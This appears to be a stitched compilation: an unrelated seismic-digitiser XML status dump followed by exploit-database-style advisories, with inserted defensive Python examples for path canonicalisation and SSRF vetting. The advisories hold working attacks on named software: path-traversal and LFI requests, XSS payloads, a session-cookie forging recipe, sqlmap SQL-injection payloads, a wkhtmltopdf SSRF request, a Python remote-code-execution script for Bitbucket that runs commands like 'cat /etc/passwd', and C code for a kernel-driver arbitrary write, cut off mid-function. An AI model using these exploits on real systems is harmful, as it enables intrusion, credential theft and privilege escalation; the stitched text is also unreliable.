title='Sample rate'>nan</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-X00</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'></reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'></reading>
</list-item>
<list-item status='-1' display-primary='true' path='AB7AFF68' title='DONB-XIB'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>nan</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-XIB</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'></reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'></reading>
</list-item>
</list>
</module>
<module status='-1' display-primary='true' path='gdi2miniseed.default' title='Mini-SEED compressor. Default instance'>
<reading status='100' display-primary='true' path='num_samples_in'
title='Total number of data samples in'>6184483152</reading>
<reading status='100' display-primary='true' path='last5_samples_in'
title='Number of samples in last 5 minutes'>180000</reading>
<reading status='100' display-primary='true' path='num_text_in'
title='Total number of text samples in'>0</reading>
<reading status='100' display-primary='true' path='last5_text_in'
title='Number of text samples in last 5 minutes'>0</reading>
<reading status='100' display-primary='true' path='num_ms_rec_out'
title='Total number of Miniseed records out'>22682743</reading>
<reading status='100' display-primary='true' path='last5_ms_rec_out'
title='Number of Miniseed records out in last 5 minutes'>655</reading>
</module>
<module status='-1' display-primary='true' path='gps' title='GPS'>
<reading status='100' display-primary='true' path='have_data'
title='GPS data received'>true</reading>
<reading status='100' display-primary='false' path='last_data'
title='Last data received from GPS'>2022-06-14T11:26:53Z</reading>
<reading status='100' display-primary='true' path='fix'
title='Fix'>3D</reading>
<reading status='100' display-primary='true' path='last_fix'
title='Timestamp of last fix'>2022-06-14T11:26:53Z</reading>
<reading status='-1' display-primary='true' path='latitude' units='°'
title='Latitude'>13.909917</reading>
<reading status='-1' display-primary='true' path='longitude' units='°'
title='Longitude'>100.593734</reading>
<reading status='-1' display-primary='true' path='elevation' units='m'
title='Elevation'>3</reading>
<reading status='100' display-primary='true' path='sv_count'
title='Count of satellites in view'>26</reading>
<reading status='100' display-primary='true' path='sv_used'
title='Count of satellites used in fix'>12</reading>
<reading status='-1' display-primary='true' path='sv_online'
title='Timestamp of last nmea sentence'>2022-06-14T11:26:52Z</reading>
<reading status='100' display-primary='true' path='rs232_detect'
title='RS232 device detect'>true</reading>
</module>
<module status='-1' display-primary='true' path='ntp' title='NTP'>
<reading status='-1' display-primary='false' path='mode'
title='Timing mode'>direct_gps</reading>
<reading status='-1' display-primary='true' path='mode_desc'
title='Timing mode'>NTP is using a GPS reference source.</reading>
<reading status='100' display-primary='true' path='locked'
title='Clock locked'>true</reading>
<reading status='100' display-primary='true' path='estimated_error' units='s'
title='Estimated error'>0.000131</reading>
<reading status='-1' display-primary='true' path='clock_source'
title='Clock source'>GPS</reading>
<reading status='-1' display-primary='false' path='peer'
title='Peer'>127.127.28.1</reading>
<reading status='-1' display-primary='false' path='peer_refid'
title='Peer&apos;s reference ID'>GPS</reading>
</module>
<module status='-1' display-primary='true' path='seedlink-out.0' title='SEEDlink network server (instance 1)'>
<reading status='-1' display-primary='true' path='num_records'
title='Total number of records seen'>22682743</reading>
<reading status='100' display-primary='true' path='last5_records'
title='Number of records seen in last 5 minutes'>655</reading>
<reading status='-1' display-primary='true' path='seq'
title='Current sequence number'>3382931</reading>
<reading status='100' display-primary='true' path='num_clients'
title='Number of clients connected'>7</reading>
<list status='-1' display-primary='true' path='clients' title='Clients'>
<list-item status='-1' display-primary='true' path='2DF96A1C' title='Client #1700'>
<reading status='-1' display-primary='true' path='remote_ip'
title='Remote IP address'>123.160.221.22</reading>
<reading status='-1' display-primary='true' path='remote_port'
title='Remote TCP port'>21100</reading>
<reading status='-1' display-primary='true' path='dialup'
title='Dialup mode'>false</reading>
<reading status='-1' display-primary='true' path='seqno'
title='Last sequence no'>0</reading>
</list-item>
<list-item status='-1' display-primary='true' path='79C29121' title='Client #3412'>
<reading status='-1' display-primary='true' path='remote_ip'
title='Remote IP address'>113.53.234.98</reading>
<reading status='-1' display-primary='true' path='remote_port'
title='Remote TCP port'>33964</reading>
<reading status='-1' display-primary='true' path='dialup'
title='Dialup mode'>false</reading>
<reading status='-1' display-primary='true' path='seqno'
title='Last sequence no'>0</reading>
</list-item>
<list-item status='-1' display-primary='true' path='5060E6FF' title='Client #3581'>
<reading status='-1' display-primary='true' path='remote_ip'
title='Remote IP address'>203.114.125.67</reading>
<reading status='-1' display-primary='true' path='remote_port'
title='Remote TCP port'>48666</reading>
<reading status='-1' display-primary='true' path='dialup'
title='Dialup mode'>false</reading>
<reading status='-1' display-primary='true' path='seqno'
title='Last sequence no'>3221351</reading>
</list-item>
<list-item status='-1' display-primary='true' path='B1A1AB18' title='Client #3723'>
<reading status='-1' display-primary='true' path='remote_ip'
title='Remote IP address'>113.53.234.98</reading>
<reading status='-1' display-primary='true' path='remote_port'
title='Remote TCP port'>45158</reading>
<reading status='-1' display-primary='true' path='dialup'
title='Dialup mode'>false</reading>
<reading status='-1' display-primary='true' path='seqno'
title='Last sequence no'>3382931</reading>
</list-item>
<list-item status='-1' display-primary='true' path=' 91FC71C' title='Client #3720'>
<reading status='-1' display-primary='true' path='remote_ip'
title='Remote IP address'>221.128.101.50</reading>
<reading status='-1' display-primary='true' path='remote_port'
title='Remote TCP port'>55776</reading>
<reading status='-1' display-primary='true' path='dialup'
title='Dialup mode'>false</reading>
<reading status='-1' display-primary='true' path='seqno'
title='Last sequence no'>3382931</reading>
</list-item>
<list-item status='-1' display-primary='true' path='599CD113' title='Client #3721'>
<reading status='-1' display-primary='true' path='remote_ip'
title='Remote IP address'>118.175.2.50</reading>
<reading status='-1' display-primary='true' path='remote_port'
title='Remote TCP port'>60818</reading>
<reading status='-1' display-primary='true' path='dialup'
title='Dialup mode'>false</reading>
<reading status='-1' display-primary='true' path='seqno'
title='Last sequence no'>3382931</reading>
</list-item>
<list-item status='-1' display-primary='true' path='BAB80847' title='Client #3722'>
<reading status='-1' display-primary='true' path='remote_ip'
title='Remote IP address'>203.114.125.67</reading>
<reading status='-1' display-primary='true' path='remote_port'
title='Remote TCP port'>53984</reading>
<reading status='-1' display-primary='true' path='dialup'
title='Dialup mode'>false</reading>
<reading status='-1' display-primary='true' path='seqno'
title='Last sequence no'>3382931</reading>
</list-item>
</list>
</module>
<module status='-1' display-primary='true' path='storage' title='Storage'>
<reading status='100' display-primary='true' path='state'
title='State'>Inactive</reading>
<reading status='100' display-primary='true' path='recording_state'
title='Recording state'>Last flush good</reading>
<reading status='-1' display-primary='true' path='last_accessed'
title='Last accessed'>2022-06-14T08:10:14Z</reading>
<reading status='-1' display-primary='true' path='free_space_pct'
title='Free space'>27.2%</reading>
<reading status='-1' display-primary='false' path='free_space' units='bytes'
title='Available space'>17449811968</reading>
<reading status='-1' display-primary='true' path='size' units='bytes'
title='Storage size'>64134021120</reading>
<reading status='100' display-primary='false' path='fs_type'
title='Filesystem type'>VFAT</reading>
<list status='-1' display-primary='false' path='clients' title='Clients'>
</list>
</module>
<module status='-1' display-primary='true' path='system' title='Linux system'>
<reading status='-1' display-primary='false' path='serial_number'
title='Serial number'>DAS-405D62</reading>
<reading status='-1' display-primary='true' path='uptime' units='s'
title='System uptime'>10307538</reading>
<reading status='-1' display-primary='true' path='load_average'
title='Load Average'>1.72</reading>
<reading status='100' display-primary='true' path='root_free_space' units='bytes'
title='Root filesystem free space'>437809152</reading>
<reading status='100' display-primary='true' path='root_percent_free_space'
title='Root filesystem percentage space free'>77.0%</reading>
<reading status='-1' display-primary='true' path='build_label'
title='Software repository label'>&example;</reading>
<reading status='-1' display-primary='true' path='build_version'
title='Software build number'>15809</reading>
<reading status='-1' display-primary='true' path='build_machine'
title='Build machine'>CMG-DAS</reading>
<reading status='-1' display-primary='true' path='last_reboot_1'
title='Reboot 1'>2021-04-08T05:06:17Z</reading>
<reading status='-1' display-primary='true' path='last_reboot_2'
title='Reboot 2'>2021-04-08T07:02:50Z</reading>
<reading status='-1' display-primary='true' path='last_reboot_3'
title='Reboot 3'>2021-04-08T08:00:33Z</reading>
<reading status='-1' display-primary='true' path='last_reboot_4'
title='Reboot 4'>2021-04-08T08:30:41Z</reading>
<reading status='-1' display-primary='true' path='last_reboot_5'
title='Reboot 5'>2021-04-08T08:39:15Z</reading>
<reading status='-1' display-primary='true' path='last_reboot_6'
title='Reboot 6'>2021-04-08T08:46:24Z</reading>
<reading status='-1' display-primary='true' path='last_reboot_7'
title='Reboot 7'>2021-04-08T10:08:51Z</reading>
<reading status='-1' display-primary='true' path='last_reboot_8'
title='Reboot 8'>2021-04-09T07:10:41Z</reading>
<reading status='-1' display-primary='true' path='last_reboot_9'
title='Reboot 9'>2021-10-07T06:48:35Z</reading>
<reading status='-1' display-primary='true' path='last_reboot_10'
title='Reboot 10'>2022-02-15T04:14:30Z</reading>
<reading status='100' display-primary='true' path='temperature' units='°C'
title='System temperature'>43.875</reading>
<reading status='100' display-primary='true' path='voltage' units='V'
title='Power supply voltage'>12.75</reading>
<reading status='100' display-primary='true' path='current' units='A'
title='Power supply current'>0.442</reading>
<reading status='100' display-primary='true' path='sensor_A_voltage' units='V'
title='Sensor A voltage'>12.675</reading>
<reading status='100' display-primary='true' path='sensor_A_current' units='A'
title='Sensor A current'>0.289</reading>
<reading status='100' display-primary='true' path='sensor_B_voltage' units='V'
title='Sensor B voltage'>12.725</reading>
<reading status='100' display-primary='true' path='sensor_B_current' units='A'
title='Sensor B current'>0.002</reading>
</module>
</xml-status>
```
# Exploit Title: Owlfiles File Manager 12.0.1 - Multiple Vulnerabilities
# Date: Sep 19, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.skyjos.com/
# Software Link: https://apps.apple.com/us/app/owlfiles-file-manager/id510282524
# Version: 12.0.1
# Tested on: iPhone iOS 16.0
###########
path traversal on HTTP built-in server
###########
GET /../../../../../../../../../../../../../../../System/ HTTP/1.1
Host: localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
If-None-Match: 42638202/1663558201/177889085
If-Modified-Since: Mon, 19 Sep 2022 03:30:01 GMT
Connection: close
Content-Length: 0
-------
HTTP/1.1 200 OK
Cache-Control: max-age=3600, public
Content-Length: 317
Content-Type: text/html; charset=utf-8
Connection: Close
Server: GCDWebUploader
Date: Mon, 19 Sep 2022 05:01:11 GMT
<!DOCTYPE html>
<html><head><meta charset="utf-8"></head><body>
<ul>
<li><a href="Cryptexes/">Cryptexes/</a></li>
<li><a href="DriverKit/">DriverKit/</a></li>
<li><a href="Library/">Library/</a></li>
<li><a href="Applications/">Applications/</a></li>
<li><a href="Developer/">Developer/</a></li>
</ul>
</body></html>
#############
LFI on HTTP built-in server
#############
GET /../../../../../../../../../../../../../../../etc/hosts HTTP/1.1
Host: localhost:8080
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
X-Requested-With: XMLHttpRequest
Referer: http://localhost:8080/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
----
HTTP/1.1 200 OK
Connection: Close
Server: GCDWebUploader
Content-Type: application/octet-stream
Last-Modified: Sat, 03 Sep 2022 01:37:01 GMT
Date: Mon, 19 Sep 2022 03:28:14 GMT
Content-Length: 213
Cache-Control: max-age=3600, public
Etag: 1152921500312187994/1662169021/0
##
# Host Database
#
# localhost is used to configure the loopback interface
# when the system is booting. Do not change this entry.
##
127.0.0.1 localhost
255.255.255.255 broadcasthost
::1 localhost
###############
path traversal on FTP built-in server
###############
ftp> cd ../../../../../../../../../
250 OK. Current directory is /../../../../../../../../../
ftp> ls
200 PORT command successful.
150 Accepted data connection
total 10
drwxr-xr-x 0 root wheel 256 Jan 01 1970 usr
drwxr-xr-x 0 root wheel 128 Jan 01 1970 bin
drwxr-xr-x 0 root wheel 608 Jan 01 1970 sbin
drwxr-xr-x 0 root wheel 224 Jan 01 1970 System
drwxr-xr-x 0 root wheel 640 Jan 01 1970 Library
drwxr-xr-x 0 root wheel 224 Jan 01 1970 private
drwxr-xr-x 0 root wheel 1131 Jan 01 1970 dev
drwxr-xr-x 0 root admin 4512 Jan 01 1970 Applications
drwxr-xr-x 0 root admin 64 Jan 01 1970 Developer
drwxr-xr-x 0 root admin 64 Jan 01 1970 cores
WARNING! 10 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
ftp>
#############
XSS on HTTP built-in server
#############
poc 1:
http://localhost:8080/download?path=<script>alert(1)</script>
poc 2:
http://localhost:8080/list?path=<script>alert(1)</script>
# Exploit Title: "camp" Raspberry Pi camera server 1.0 - Authentication Bypass
# Date: 2022-07-25
# Exploit Author: Elias Hohl
# Vendor Homepage: https://github.com/patrickfuller
# Software Link: https://github.com/patrickfuller/camp
# Version: < bf6af5c2e5cf713e4050c11c52dd4c55e89880b1
# Tested on: Ubuntu 20.04
# CVE : CVE-2022-37109
"camp" Raspberry Pi camera server Authentication Bypass vulnerability
https://medium.com/@elias.hohl/authentication-bypass-vulnerability-in-camp-a-raspberry-pi-camera-server-477e5d270904
1. Start an instance of the "camp" server:
python3 server.py --require-login
2. Fetch the SHA-512 password hash using one of these methods:
curl http://localhost:8000/static/password.tx%74
OR
curl http://localhost:8000/static/./password.txt --path-as-is
OR
curl http://localhost:8000/static/../camp/password.txt --path-as-is
3. Execute the following python snippet (replace the hash with the hash you received in step 2).
from tornado.web import create_signed_value
import time

# camp passes the SHA-512 password hash to Tornado as the cookie secret, so anyone who
# can read that hash from /static/ can mint a valid "camp" session cookie for the current time
print(create_signed_value("5895bb1bccf1da795c83734405a7a0193fbb56473842118dd1b66b2186a290e00fa048bc2a302d763c381ea3ac3f2bc2f30aaa005fb2c836bbf641d395c4eb5e", "camp", str(time.time())))
4. In the browser, navigate to http://localhost:8000/, add a cookie named "camp" and set the value to the result of the script from step 3, then reload the page. You will be logged in.
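Both advisories above come down to the same server-side mistake: the file-serving endpoint (GCDWebUploader in Owlfiles, the /static/ handler in camp) compares or joins the request path before canonicalizing it, so "../" climbs out of the share, "./" and "password.tx%74" slip past a filename check. The following is an added example written for this page, not code from either project or either advisory; the root directory, the denylist and the sample inputs are assumed values. It shows the order of operations that closes all three bypasses: decode until stable, refuse NUL and backslash, walk segments with an explicit stack that refuses to climb above the root, and only then apply any filename denylist to the canonical name.

```python
# Added example, not taken from the Owlfiles or camp advisories or either project's
# code: the path handling a file-serving endpoint needs so the tricks shown above
# (../ climbing, './' prefixes, percent-encoded names such as password.tx%74) are
# rejected before anything is opened. Root, denylist and inputs are assumed values.
import posixpath
from urllib.parse import unquote


class PathRejected(Exception):
    """Raised when a request path would leave the served root or name a denied file."""


def resolve_served_path(root, request_path, denied_names=frozenset(), max_decode_rounds=3):
    """Map a raw request path (as it appears on the wire) to a path under ``root``.

    Order matters:
      1. Percent-decode until stable, so 'password.tx%74' and double encodings
         such as '%252e%252e' collapse to their real form before any comparison.
      2. Reject NUL bytes and backslashes, which C filename APIs and Windows
         path handling would reinterpret.
      3. Walk the segments with an explicit stack; a '..' on an empty stack is
         an attempt to leave the root and is refused instead of silently clamped.
      4. Apply the denylist to the canonical basename only after steps 1-3,
         so encoding or './' prefixes cannot bypass it.
    """
    decoded = request_path
    for _ in range(max_decode_rounds):
        once = unquote(decoded)
        if once == decoded:
            break
        decoded = once
    if unquote(decoded) != decoded:
        # still encoded after the allowed rounds: fail closed rather than guess
        raise PathRejected("too many encoding layers")
    if "\x00" in decoded:
        raise PathRejected("NUL byte in path")
    if "\\" in decoded:
        raise PathRejected("backslash in path")

    segments = []
    for seg in decoded.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not segments:
                raise PathRejected("path escapes the served root")
            segments.pop()
            continue
        segments.append(seg)

    if segments and segments[-1] in denied_names:
        raise PathRejected("access to %r is denied" % segments[-1])
    return posixpath.join(root, *segments) if segments else root


def is_rejected(root, request_path, denied_names=frozenset()):
    """True when resolve_served_path() refuses the request (used by the demo and tests)."""
    try:
        resolve_served_path(root, request_path, denied_names)
    except PathRejected:
        return True
    return False


if __name__ == "__main__":
    # Constructed inputs: the payloads from the two advisories above plus a benign one.
    denied = frozenset({"password.txt"})
    for path in ("/../../../../../../etc/hosts",          # Owlfiles LFI
                 "password.tx%74",                          # camp: encoded filename
                 "./password.txt",                          # camp: dot segment
                 "../camp/password.txt",                    # camp: climb out of static/
                 "%252e%252e/%252e%252e/etc/hosts",         # double encoding
                 "css/site.css"):                           # legitimate request
        verdict = "REJECT" if is_rejected("/srv/static", path, denied) else "serve"
        print("%-40s -> %s" % (path, verdict))
```

The denylist is there only to mirror what camp tried to do; the durable fix for that case is to keep password.txt out of the served tree altogether, and on a real filesystem the resolved path should additionally be checked with os.path.realpath so a symlink inside the root cannot point outside it.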
# Exploit Title: Translatepress Multilingual WordPress plugin < 2.3.3 - Authenticated SQL Injection
# Exploit Author: Elias Hohl
# Date: 2022-07-23
# Vendor Homepage: https://translatepress.com/
# Software Link: https://wordpress.org/plugins/translatepress-multilingual/
# Version: < 2.3.3
# Tested on: Ubuntu 20.04
# CVE : CVE-2022-3141
Authenticated SQL injection vulnerability in the "Translatepress Multilingual" WordPress plugin
https://medium.com/@elias.hohl/authenticated-sql-injection-vulnerability-in-translatepress-multilingual-wordpress-plugin-effc08eda514
1. Start a new WordPress instance using docker-compose.
2. Install the translatepress-multilingual plugin. Important note: if a premium plan allows more than two languages, the exploit may differ slightly; deletion requests may have to be inserted between injections so that payloads are not executed again. Also note that the en_us_en_gb dictionary table must exist; you may need to add these languages first so the table gets created.
3. Proxy your browser through Burp Suite, log in to WordPress and add any language from the dropdown (the URL for this is /wp-admin/options-general.php?page=translate-press). In Burp Suite, right-click the request, choose "Copy to file", and save it as translatepress_req.txt.
4. Go to /sample-page/?trp-edit-translation=preview (the URL that translates an arbitrary post). Again, right-click the request in Burp Suite, save it to file, and name it translatepress_req_2.txt.
5. Attack using sqlmap: sqlmap -r translatepress_req.txt -p trp_settings%5Btranslation-languages%5D%5B%5D --dbms=mysql --second-req translatepress_req_2.txt --technique=T --level 5 --risk 3
sqlmap will find a time-based blind payload:
Parameter: trp_settings[translation-languages][] (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: option_page=trp_settings&action=update&_wpnonce=ca410d0e89&_wp_http_referer=/wp-admin/options-general.php?page=translate-press%26settings-updated=true&trp_settings[default-language]=en_US&trp_settings[publish-languages][]=en_US&trp_settings[translation-languages][]=en_US&trp_settings[translation-languages-formality][]=default&trp_settings[url-slugs][en_US]=en_us&trp_settings[translation-languages][]=en_GB WHERE 4372=4372 AND (SELECT 6967 FROM (SELECT(SLEEP(5)))ZDtR)-- bsZU&trp_settings[publish-languages][]=en_GB&trp_settings[translation-languages-formality][]=default&trp_settings[url-slugs][en_GB]=en&trp_settings[native_or_english_name]=english_name&trp_settings[add-subdirectory-to-default-language]=no&trp_settings[force-language-to-custom-links]=yes&trp_settings[shortcode-options]=flags-full-names&trp_settings[menu-options]=flags-full-names&trp_settings[trp-ls-floater]=yes&trp_settings[floater-options]=flags-full-names&trp_settings[floater-color]=dark&trp_settings[floater-position]=bottom-right&trp_email_course_email=
# Exploit Title: wkhtmltopdf 0.12.6 - Server Side Request Forgery
# Date: 20/8/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://wkhtmltopdf.org
# Software Link: https://wkhtmltopdf.org/downloads.html
# Version: 0.12.6
# Tested on: Windows, ASP.NET
POST /PDF/FromHTML HTTP/1.1
Host: vulnerable.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: <length>
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
__RequestVerificationToken=Token&header=<PDFstructure+>....&data=<PDFstructure+>....<iframe+src="http://10.10.10.1">
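The request above works because the renderer fetches whatever the submitted HTML references, so an <iframe> pointing at an internal address turns the PDF service into a proxy. What follows is an added example for this page, not code from wkhtmltopdf or from the advisory: before handing user HTML to any HTML-to-PDF renderer, collect every URL the renderer would fetch on its own and refuse the document if any of them resolves to a loopback, private, link-local or otherwise non-public address. The host names and the resolver table are constructed for the demo; in production the default socket.getaddrinfo is used.

```python
# Added example; not from the wkhtmltopdf project or the advisory above. Before
# user-supplied HTML reaches a renderer, collect every URL the renderer would
# fetch on its own and block the document if any of them points at a loopback,
# private, link-local or otherwise non-public address. Host names and the
# resolver table are constructed for the demo.
import ipaddress
import socket
from html.parser import HTMLParser
from urllib.parse import urlsplit

# attributes a rendering engine dereferences without user interaction
URL_ATTRS = {
    "iframe": ("src",), "frame": ("src",), "img": ("src",), "script": ("src",),
    "link": ("href",), "object": ("data",), "embed": ("src",), "source": ("src",),
    "video": ("src", "poster"), "audio": ("src",), "input": ("src",),
}


class _RefCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        wanted = URL_ATTRS.get(tag.lower())
        if not wanted:
            return
        for name, value in attrs:
            if name.lower() in wanted and value:
                self.refs.append(value.strip())


def collect_refs(html):
    """Every URL in the document that the renderer would fetch."""
    parser = _RefCollector()
    parser.feed(html)
    parser.close()
    return parser.refs


def is_disallowed_address(ip):
    """Anything that is not a public unicast address is off limits for a render job."""
    addr = ipaddress.ip_address(ip)
    return (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_reserved or addr.is_multicast or addr.is_unspecified)


def make_static_resolver(table):
    """Offline stand-in for socket.getaddrinfo: table maps host name -> list of IPs.
    Numeric hosts resolve to themselves, as the real resolver would."""
    def resolver(host, port, **_ignored):
        try:
            ipaddress.ip_address(host)
            ips = [host]
        except ValueError:
            if host not in table:
                raise socket.gaierror("constructed resolver: unknown host %r" % host)
            ips = table[host]
        return [(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP, "", (ip, port))
                for ip in ips]
    return resolver


def check_ref(ref, resolver=socket.getaddrinfo):
    """None when the reference may be fetched, otherwise the reason it may not."""
    parts = urlsplit(ref)
    scheme = parts.scheme.lower()
    if scheme not in ("http", "https"):
        # file:, ftp:, data:, javascript: or a relative path: never fetched on our behalf
        return "scheme %r not allowed" % (scheme or "relative")
    host = parts.hostname
    if not host:
        return "missing host"
    try:
        port = parts.port or (443 if scheme == "https" else 80)
    except ValueError:
        return "invalid port"
    try:
        answers = resolver(host, port, proto=socket.IPPROTO_TCP)
    except socket.gaierror:
        return "host %r does not resolve" % host
    # One private answer is enough to refuse: a dual-homed name is how DNS rebinding starts.
    for _family, _type, _proto, _canon, sockaddr in answers:
        if is_disallowed_address(sockaddr[0]):
            return "host %r resolves to disallowed address %s" % (host, sockaddr[0])
    return None


def vet_html_for_render(html, resolver=socket.getaddrinfo):
    """(ref, reason) for each reference that must stop the render; empty means go ahead."""
    findings = []
    for ref in collect_refs(html):
        reason = check_ref(ref, resolver)
        if reason:
            findings.append((ref, reason))
    return findings
```

Two caveats a reviewer would raise: the check runs at vet time and the renderer resolves again at fetch time, so a short-TTL name can still rebind to an internal address, which is why the renderer host itself should also be egress-filtered; and this parser does not see url() references inside CSS or redirects followed by the renderer, so pass wkhtmltopdf --disable-local-file-access and --disable-javascript as well rather than relying on the HTML filter alone.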
# Exploit Title: Bitbucket v7.0.0 - RCE
# Date: 09-23-2022
# Exploit Author: khal4n1
# Vendor Homepage: https://github.com/khal4n1
# Tested on: Kali and Ubuntu 22.04 LTS
# CVE : cve-2022-36804
#****************************************************************#
# The following exploit targets a vulnerability present in
# Atlassian Bitbucket Server and Data Center 7.0.0 before version
# 7.6.17, from version 7.7.0 before version 7.17.10, from version
# 7.18.0 before version 7.21.4, from version 8.0.0 before version
# 8.0.3, from version 8.1.0 before version 8.1.3, from version
# 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1.
# Usage example:
#   python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'cat /etc/passwd'
#   python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'id'
# The server answers with an HTTP 500 whose body contains the stdout
# of the executed command. The target needs at least one public
# repository, which the script discovers from /repos?visibility=public.
#****************************************************************#
#!/usr/bin/python3
import argparse
import re
import urllib.error
import urllib.parse
import urllib.request

# argument setup
parser = argparse.ArgumentParser(description='Program to test bitbucket vulnerability CVE-2022-36804')
parser.add_argument("--url", help="Set the target to attack. [REQUIRED]", required=True)
parser.add_argument("--cmd", help="Set the command to execute. [DEFAULT id]", default='id')
args = parser.parse_args()

cmd = urllib.parse.quote(args.cmd)

# read the public repository listing; its links carry the project key and repo slug
requ = urllib.request.urlopen(args.url + "/repos?visibility=public")
response = requ.read().decode(errors="replace")

# select a public project and store its key (the hardcoded 7990 assumes the default Bitbucket port)
project = re.findall('7990/projects/(.*)/repos/',
                     str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[-1]

# select a public repo and store its slug
file = re.findall('/repos/(.*)/browse',
                  str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[0]

# Exploitation: the NUL bytes split the prefix into extra git arguments,
# so --exec runs the backticked command on the server
try:
    attack = urllib.request.urlopen(args.url
                                    + "/rest/api/latest/projects/" + project + "/repos/" + file
                                    + "/archive?prefix=ax%00--exec=%60" + cmd + "%60%00--remote=origin")
    print(attack.read().decode())
except urllib.error.HTTPError as e:
    # the server answers 500 with the command output embedded in the body
    body = e.read().decode()
    print(body)
# Exploit Title: NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi
# Exploit Author: Elias Hohl
# Date: 2022-08-01
# Vendor Homepage: https://basixonline.net
# Software Link: https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
# Tested on: Ubuntu 20.04
# CVE : CVE-2022-3142
Authenticated SQL injection vulnerability in the "NEX Forms" WordPress plugin
https://medium.com/@elias.hohl/authenticated-sql-injection-vulnerability-in-nex-forms-wordpress-plugin-35b8558dd0f5
1. Start a new WordPress instance using docker-compose.
2. Install the NEX Forms plugin.
3. Open the URL "/wp-admin/admin.php?page=nex-forms-dashboard&form_id=1" in your browser and save the request to "nex_forms_req.txt" via Burp Suite.
4. Execute the following command: sqlmap -r nex_forms_req.txt -p form_id --technique=T --dbms=mysql --level 5 --risk 3
sqlmap will find a time-based blind payload:
Parameter: form_id (GET)
Type: time-based blind
Title: MySQL >=5.0.12 AND time-based blind (query SLEEP)
Payload: page=nex-forms-dashboard&form_id=1 AND (SELECT 4715 FROM (SELECT(SLEEP(5)))nPUi)
/*
# Exploit Title: System Mechanic v15.5.0.61 - Arbitrary Read/Write
# Date: 26-09-2022
# Exploit Author: Brandon Marshall
# Vendor Homepage: https://www.iolo.com/
# Tested Version - System Mechanic version 15.5.0.61
# Driver Version - 5.4.11 - amp.sys
# Tested on OS - 64 bit Windows 10 (18362)
# Fixed Version - System Mechanic 17.5.0.116
# CVE : CVE-2018-5701
*/
#include <iostream>
#include <Windows.h>
#include <psapi.h>
#include <stdio.h>
#pragma warning(disable:4996)
typedef struct _kernelDriverInformation {
char* imageName;
void* imageBase;
}kernelDriverInformation, * PKernelDriverInformation;
typedef struct _functionInformation {
char* functionName;
void* functionOffset;
void* functionBase;
}functionInformation, * PFunctionInformation;
void callDeviceIoControl(HANDLE deviceHandle, void* inputBuffer, DWORD inputBufferSize) {
    DWORD bytesReturned = 0;
    // IOCTL 0x226003 is the amp.sys dispatcher that interprets the buffer layout built below;
    // DeviceIoControl returns BOOL, not NTSTATUS
    BOOL ok = DeviceIoControl(deviceHandle, 0x226003, inputBuffer, inputBufferSize, NULL, 0, &bytesReturned, NULL);
    if (!ok) {
        fprintf(stderr, "DeviceIoControl failed: %lu\n", GetLastError());
    }
}
HANDLE getDeviceHandle(char* name) {
DWORD generic_read = 0x80000000;
DWORD generic_write = 0x40000000;
HANDLE handle = CreateFileA((LPCSTR)name, GENERIC_READ | generic_write, NULL, NULL, 0x3, NULL, NULL);
return handle;
}
void* CreateWriteAddresInAMPsKernelMemoryIOCTLBuffer(void* addressToDereference, SIZE_T bufferSize) {
byte* maliciousBuffer = (byte*)malloc(bufferSize);
*(ULONGLONG*)maliciousBuffer = (ULONGLONG)5; // function pointer index, this will be 5
*(ULONGLONG*)(maliciousBuffer + 0x8) = (ULONGLONG)(maliciousBuffer + 0x20); //(maliciousBuffer); pointer to parameters
*(ULONGLONG*)(maliciousBuffer + 0x10) = (ULONGLONG)(maliciousBuffer + 0x10); //(maliciousBuffer + 0x20);// (0x1); pointer to write return value
